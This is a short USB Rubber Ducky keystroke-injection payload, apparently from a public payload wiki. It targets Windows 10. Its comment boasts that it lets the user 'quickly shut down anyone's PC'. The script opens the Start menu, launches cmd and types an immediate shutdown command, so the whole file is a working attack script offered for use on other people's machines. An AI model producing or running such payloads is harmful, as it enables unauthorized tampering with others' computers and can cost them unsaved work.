wiki-rubber-ducky-usb/Payload---Windows-10-:-Shut...

8 lines
198 B
Plaintext

REM: This is just a simple script that will allow you to quicky shut down anyone's PC with just a few lines of code.
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 200
STRING shutdown.exe /s /t 00
ENTER